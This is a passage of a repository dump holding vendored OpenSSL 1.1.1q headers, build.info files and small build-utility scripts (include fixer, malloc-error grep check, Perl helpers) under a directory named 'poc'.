(the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* save state */ 16 | #pragma names save 17 | /* have the compiler shorten symbols larger than 31 chars to 23 chars 18 | * followed by a 8 hex char CRC 19 | */ 20 | #pragma names as_is,shortened 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/async.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | int async_init(void); 13 | void async_deinit(void); 14 | void async_delete_thread_state(void); 15 | 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/bn_conf.h.in: -------------------------------------------------------------------------------- 1 | {- join("\n",map { "/* $_ */" } @autowarntext) -} 2 | /* 3 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | */ 10 | 11 | #ifndef OSSL_CRYPTO_BN_CONF_H 12 | # define OSSL_CRYPTO_BN_CONF_H 13 | 14 | /* 15 | * The contents of this file are not used in the UEFI build, as 16 | * both 32-bit and 64-bit builds are supported from a single run 17 | * of the Configure script. 18 | */ 19 | 20 | /* Should we define BN_DIV2W here? */ 21 | 22 | /* Only one for the following should be defined */ 23 | {- $config{b64l} ? "#define" : "#undef" -} SIXTY_FOUR_BIT_LONG 24 | {- $config{b64} ? "#define" : "#undef" -} SIXTY_FOUR_BIT 25 | {- $config{b32} ? "#define" : "#undef" -} THIRTY_TWO_BIT 26 | 27 | #endif 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/bn_dh.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #define declare_dh_bn(x) \ 11 | extern const BIGNUM _bignum_dh##x##_p; \ 12 | extern const BIGNUM _bignum_dh##x##_g; \ 13 | extern const BIGNUM _bignum_dh##x##_q; 14 | 15 | declare_dh_bn(1024_160) 16 | declare_dh_bn(2048_224) 17 | declare_dh_bn(2048_256) 18 | 19 | extern const BIGNUM _bignum_ffdhe2048_p; 20 | extern const BIGNUM _bignum_ffdhe3072_p; 21 | extern const BIGNUM _bignum_ffdhe4096_p; 22 | extern const BIGNUM _bignum_ffdhe6144_p; 23 | extern const BIGNUM _bignum_ffdhe8192_p; 24 | extern const BIGNUM _bignum_const_2; 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/bn_srp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2014-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OPENSSL_NO_SRP 11 | 12 | extern const BIGNUM bn_group_1024; 13 | 14 | extern const BIGNUM bn_group_1536; 15 | 16 | extern const BIGNUM bn_group_2048; 17 | 18 | extern const BIGNUM bn_group_3072; 19 | 20 | extern const BIGNUM bn_group_4096; 21 | 22 | extern const BIGNUM bn_group_6144; 23 | 24 | extern const BIGNUM bn_group_8192; 25 | 26 | extern const BIGNUM bn_generator_19; 27 | 28 | extern const BIGNUM bn_generator_5; 29 | 30 | extern const BIGNUM bn_generator_2; 31 | 32 | #endif 33 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/engine.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | void engine_load_openssl_int(void); 13 | void engine_load_devcrypto_int(void); 14 | void engine_load_rdrand_int(void); 15 | void engine_load_dynamic_int(void); 16 | void engine_load_padlock_int(void); 17 | void engine_load_capi_int(void); 18 | void engine_load_dasync_int(void); 19 | void engine_load_afalg_int(void); 20 | void engine_cleanup_int(void); 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/err.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_ERR_H 11 | # define OSSL_CRYPTO_ERR_H 12 | 13 | int err_load_crypto_strings_int(void); 14 | void err_cleanup(void); 15 | void err_delete_thread_state(void); 16 | int err_shelve_state(void **); 17 | void err_unshelve_state(void *); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/lhash.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_LHASH_H 11 | # define OSSL_CRYPTO_LHASH_H 12 | 13 | unsigned long openssl_lh_strcasehash(const char *); 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/objects.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | void obj_cleanup_int(void); 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/poly1305.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | #define POLY1305_BLOCK_SIZE 16 13 | #define POLY1305_DIGEST_SIZE 16 14 | #define POLY1305_KEY_SIZE 32 15 | 16 | typedef struct poly1305_context POLY1305; 17 | 18 | size_t Poly1305_ctx_size(void); 19 | void Poly1305_Init(POLY1305 *ctx, const unsigned char key[32]); 20 | void Poly1305_Update(POLY1305 *ctx, const unsigned char *inp, size_t len); 21 | void Poly1305_Final(POLY1305 *ctx, unsigned char mac[16]); 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/sha.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * Copyright (c) 2018, Oracle and/or its affiliates. All rights reserved. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | */ 10 | 11 | #ifndef OSSL_CRYPTO_SHA_H 12 | # define OSSL_CRYPTO_SHA_H 13 | 14 | # include 15 | 16 | int sha512_224_init(SHA512_CTX *); 17 | int sha512_256_init(SHA512_CTX *); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/siphash.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2017-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | #define SIPHASH_BLOCK_SIZE 8 13 | #define SIPHASH_KEY_SIZE 16 14 | #define SIPHASH_MIN_DIGEST_SIZE 8 15 | #define SIPHASH_MAX_DIGEST_SIZE 16 16 | 17 | typedef struct siphash_st SIPHASH; 18 | 19 | size_t SipHash_ctx_size(void); 20 | size_t SipHash_hash_size(SIPHASH *ctx); 21 | int SipHash_set_hash_size(SIPHASH *ctx, size_t hash_size); 22 | int SipHash_Init(SIPHASH *ctx, const unsigned char *k, 23 | int crounds, int drounds); 24 | void SipHash_Update(SIPHASH *ctx, const unsigned char *in, size_t inlen); 25 | int SipHash_Final(SIPHASH *ctx, unsigned char *out, size_t outlen); 26 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/store.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2019 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_STORE_H 11 | # define OSSL_CRYPTO_STORE_H 12 | 13 | # include 14 | # include 15 | # include 16 | 17 | /* 18 | * Two functions to read PEM data off an already opened BIO. To be used 19 | * instead of OSSLSTORE_open() and OSSLSTORE_close(). Everything is done 20 | * as usual with OSSLSTORE_load() and OSSLSTORE_eof(). 21 | */ 22 | OSSL_STORE_CTX *ossl_store_attach_pem_bio(BIO *bp, const UI_METHOD *ui_method, 23 | void *ui_data); 24 | int ossl_store_detach_pem_bio(OSSL_STORE_CTX *ctx); 25 | 26 | void ossl_store_cleanup_int(void); 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/__DECC_INCLUDE_EPILOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* restore state. Must correspond to the save in __decc_include_prologue.h */ 16 | #pragma names restore 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/__DECC_INCLUDE_PROLOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* save state */ 16 | #pragma names save 17 | /* have the compiler shorten symbols larger than 31 chars to 23 chars 18 | * followed by a 8 hex char CRC 19 | */ 20 | #pragma names as_is,shortened 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/comp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | void comp_zlib_cleanup_int(void); 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/conf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2019 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_INTERNAL_CONF_H 11 | # define OSSL_INTERNAL_CONF_H 12 | 13 | #include 14 | 15 | #define DEFAULT_CONF_MFLAGS \ 16 | (CONF_MFLAGS_DEFAULT_SECTION | \ 17 | CONF_MFLAGS_IGNORE_MISSING_FILE | \ 18 | CONF_MFLAGS_IGNORE_RETURN_CODES) 19 | 20 | struct ossl_init_settings_st { 21 | char *filename; 22 | char *appname; 23 | unsigned long flags; 24 | }; 25 | 26 | int openssl_config_int(const OPENSSL_INIT_SETTINGS *); 27 | void openssl_no_config_int(void); 28 | void conf_modules_free_int(void); 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/err.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_INTERNAL_ERR_H 11 | # define OSSL_INTERNAL_ERR_H 12 | 13 | void err_free_strings_int(void); 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/nelem.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2017 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_INTERNAL_NELEM_H 11 | # define OSSL_INTERNAL_NELEM_H 12 | 13 | # define OSSL_NELEM(x) (sizeof(x)/sizeof((x)[0])) 14 | #endif 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/o_str.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2003-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_INTERNAL_O_STR_H 11 | # define OSSL_INTERNAL_O_STR_H 12 | 13 | # include /* to get size_t */ 14 | 15 | int OPENSSL_memcmp(const void *p1, const void *p2, size_t n); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/internal/sslconf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_INTERNAL_SSLCONF_H 11 | # define OSSL_INTERNAL_SSLCONF_H 12 | 13 | typedef struct ssl_conf_cmd_st SSL_CONF_CMD; 14 | 15 | const SSL_CONF_CMD *conf_ssl_get(size_t idx, const char **name, size_t *cnt); 16 | int conf_ssl_name_find(const char *name, size_t *idx); 17 | void conf_ssl_get_cmd(const SSL_CONF_CMD *cmd, size_t idx, char **cmdstr, 18 | char **arg); 19 | 20 | #endif 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/__DECC_INCLUDE_EPILOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2020 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C/C++ on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* 16 | * The C++ compiler doesn't understand these pragmas, even though it 17 | * understands the corresponding command line qualifier. 18 | */ 19 | #ifndef __cplusplus 20 | /* restore state. Must correspond to the save in __decc_include_prologue.h */ 21 | # pragma names restore 22 | #endif 23 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/__DECC_INCLUDE_PROLOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2020 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C/C++ on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* 16 | * The C++ compiler doesn't understand these pragmas, even though it 17 | * understands the corresponding command line qualifier. 18 | */ 19 | #ifndef __cplusplus 20 | /* save state */ 21 | # pragma names save 22 | /* have the compiler shorten symbols larger than 31 chars to 23 chars 23 | * followed by a 8 hex char CRC 24 | */ 25 | # pragma names as_is,shortened 26 | #endif 27 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/buffererr.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Generated by util/mkerr.pl DO NOT EDIT 3 | * Copyright 1995-2019 The OpenSSL Project Authors. All Rights Reserved. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | */ 10 | 11 | #ifndef HEADER_BUFERR_H 12 | # define HEADER_BUFERR_H 13 | 14 | # ifndef HEADER_SYMHACKS_H 15 | # include 16 | # endif 17 | 18 | # ifdef __cplusplus 19 | extern "C" 20 | # endif 21 | int ERR_load_BUF_strings(void); 22 | 23 | /* 24 | * BUF function codes. 25 | */ 26 | # define BUF_F_BUF_MEM_GROW 100 27 | # define BUF_F_BUF_MEM_GROW_CLEAN 105 28 | # define BUF_F_BUF_MEM_NEW 101 29 | 30 | /* 31 | * BUF reason codes. 32 | */ 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/ecdh.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/ecdsa.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/pem2.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1999-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef HEADER_PEM2_H 11 | # define HEADER_PEM2_H 12 | # include 13 | #endif 14 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/rc4.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef HEADER_RC4_H 11 | # define HEADER_RC4_H 12 | 13 | # include 14 | 15 | # ifndef OPENSSL_NO_RC4 16 | # include 17 | #ifdef __cplusplus 18 | extern "C" { 19 | #endif 20 | 21 | typedef struct rc4_key_st { 22 | RC4_INT x, y; 23 | RC4_INT data[256]; 24 | } RC4_KEY; 25 | 26 | const char *RC4_options(void); 27 | void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data); 28 | void RC4(RC4_KEY *key, size_t len, const unsigned char *indata, 29 | unsigned char *outdata); 30 | 31 | # ifdef __cplusplus 32 | } 33 | # endif 34 | # endif 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/openssl/ssl2.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef HEADER_SSL2_H 11 | # define HEADER_SSL2_H 12 | 13 | #ifdef __cplusplus 14 | extern "C" { 15 | #endif 16 | 17 | # define SSL2_VERSION 0x0002 18 | 19 | # define SSL2_MT_CLIENT_HELLO 1 20 | 21 | #ifdef __cplusplus 22 | } 23 | #endif 24 | #endif 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/os-dep/haiku.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/ssl/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../libssl 2 | SOURCE[../libssl]=\ 3 | pqueue.c packet.c \ 4 | statem/statem_srvr.c statem/statem_clnt.c s3_lib.c s3_enc.c record/rec_layer_s3.c \ 5 | statem/statem_lib.c statem/extensions.c statem/extensions_srvr.c \ 6 | statem/extensions_clnt.c statem/extensions_cust.c s3_cbc.c s3_msg.c \ 7 | methods.c t1_lib.c t1_enc.c tls13_enc.c \ 8 | d1_lib.c record/rec_layer_d1.c d1_msg.c \ 9 | statem/statem_dtls.c d1_srtp.c \ 10 | ssl_lib.c ssl_cert.c ssl_sess.c \ 11 | ssl_ciph.c ssl_stat.c ssl_rsa.c \ 12 | ssl_asn1.c ssl_txt.c ssl_init.c ssl_conf.c ssl_mcnf.c \ 13 | bio_ssl.c ssl_err.c tls_srp.c t1_trce.c ssl_utst.c \ 14 | record/ssl3_buffer.c record/ssl3_record.c record/dtls1_bitmap.c \ 15 | statem/statem.c record/ssl3_record_tls13.c 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/ssl/ssl_utst.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2014-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "ssl_local.h" 11 | 12 | #ifndef OPENSSL_NO_UNIT_TEST 13 | 14 | static const struct openssl_ssl_test_functions ssl_test_functions = { 15 | ssl_init_wbio_buffer, 16 | ssl3_setup_buffers, 17 | }; 18 | 19 | const struct openssl_ssl_test_functions *SSL_test_functions(void) 20 | { 21 | return &ssl_test_functions; 22 | } 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/tools/build.info: -------------------------------------------------------------------------------- 1 | {- our $c_rehash_name = 2 | $config{target} =~ /^(VC|vms)-/ ? "c_rehash.pl" : "c_rehash"; 3 | "" -} 4 | IF[{- !$disabled{apps} -}] 5 | SCRIPTS={- $c_rehash_name -} 6 | SOURCE[{- $c_rehash_name -}]=c_rehash.in 7 | ENDIF 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/build.info: -------------------------------------------------------------------------------- 1 | IF[{- $target{build_scheme}->[1] eq "VMS" -}] 2 | SCRIPTS_NO_INST=local_shlib.com unlocal_shlib.com 3 | SOURCE[local_shlib.com]=local_shlib.com.in 4 | SOURCE[unlocal_shlib.com]=unlocal_shlib.com.in 5 | ELSIF[{- $target{build_scheme}->[1] eq "unix" -}] 6 | SCRIPTS_NO_INST=shlib_wrap.sh 7 | SOURCE[shlib_wrap.sh]=shlib_wrap.sh.in 8 | ENDIF 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/check-malloc-errs: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | # 4 | # Licensed under the OpenSSL license (the "License"). You may not use 5 | # this file except in compliance with the License. You can obtain a copy 6 | # in the file LICENSE in the source distribution or at 7 | # https://www.openssl.org/source/license.html 8 | 9 | ( 10 | pcregrep -rnM 'OPENSSL_.?alloc.*\n.*if.*NULL.*\n.*return' crypto ssl 11 | pcregrep -rnM 'if.*OPENSSL_.?alloc.*NULL.*\n.*.*return' crypto ssl 12 | ) | tee /tmp/out$$ 13 | X=0 14 | test -s /tmp/out$$ && X=1 15 | rm /tmp/out$$ 16 | exit $X 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/echo.pl: -------------------------------------------------------------------------------- 1 | #! /usr/bin/perl 2 | 3 | use strict; 4 | use warnings; 5 | use Getopt::Std; 6 | 7 | our $opt_n = 0; 8 | 9 | getopts('n') or die "Invalid option: $!\n"; 10 | 11 | print join(' ', @ARGV); 12 | print "\n" unless $opt_n; 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/fix-includes: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # Copyright 2019 The OpenSSL Project Authors. All Rights Reserved. 4 | # 5 | # Licensed under the Apache License 2.0 (the "License"). You may not use 6 | # this file except in compliance with the License. You can obtain a copy 7 | # in the file LICENSE in the source distribution or at 8 | # https://www.openssl.org/source/license.html 9 | 10 | find -name ossl_typ.h -o \( \ 11 | -name '*.h' -o \ 12 | -name '*.h.in' -o \ 13 | -name '*.c' -o \ 14 | -name '*.ec' -o \ 15 | -name 'README*' -o \ 16 | -name '*.pod' -o \ 17 | -name '*.conf' \ 18 | \) -exec sed -E -i \ 19 | -f util/fix-includes.sed {} \; 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/fix-includes.sed: -------------------------------------------------------------------------------- 1 | s|internal/([a-z0-9_]+)_int\.h|crypto/\1.h|g ; 2 | s@internal/(aria.h|async.h|bn_conf.h|bn_dh.h|bn_srp.h|chacha.h|ctype.h|__DECC_INCLUDE_EPILOGUE.H|__DECC_INCLUDE_PROLOGUE.H|dso_conf.h|engine.h|lhash.h|md32_common.h|objects.h|poly1305.h|sha.h|siphash.h|sm2err.h|sm2.h|sm3.h|sm4.h|store.h|foobar)@crypto/\1@g ; 3 | s/constant_time_locl/constant_time/g ; 4 | s/_lo?cl\.h/_local.h/g ; 5 | s/_int\.h/_local.h/g ; 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/perl/OpenSSL/Glob.pm: -------------------------------------------------------------------------------- 1 | package OpenSSL::Glob; 2 | 3 | use strict; 4 | use warnings; 5 | 6 | use File::Glob; 7 | 8 | use Exporter; 9 | use vars qw($VERSION @ISA @EXPORT); 10 | 11 | $VERSION = '0.1'; 12 | @ISA = qw(Exporter); 13 | @EXPORT = qw(glob); 14 | 15 | sub glob { 16 | goto &File::Glob::bsd_glob if $^O ne "VMS"; 17 | goto &CORE::glob; 18 | } 19 | 20 | 1; 21 | __END__ 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/perl/with_fallback.pm: -------------------------------------------------------------------------------- 1 | # Copyright 2016-2018 The OpenSSL Project Authors. All Rights Reserved. 2 | # 3 | # Licensed under the OpenSSL license (the "License"). You may not use 4 | # this file except in compliance with the License. You can obtain a copy 5 | # in the file LICENSE in the source distribution or at 6 | # https://www.openssl.org/source/license.html 7 | 8 | package with_fallback; 9 | 10 | sub import { 11 | shift; 12 | 13 | use File::Basename; 14 | use 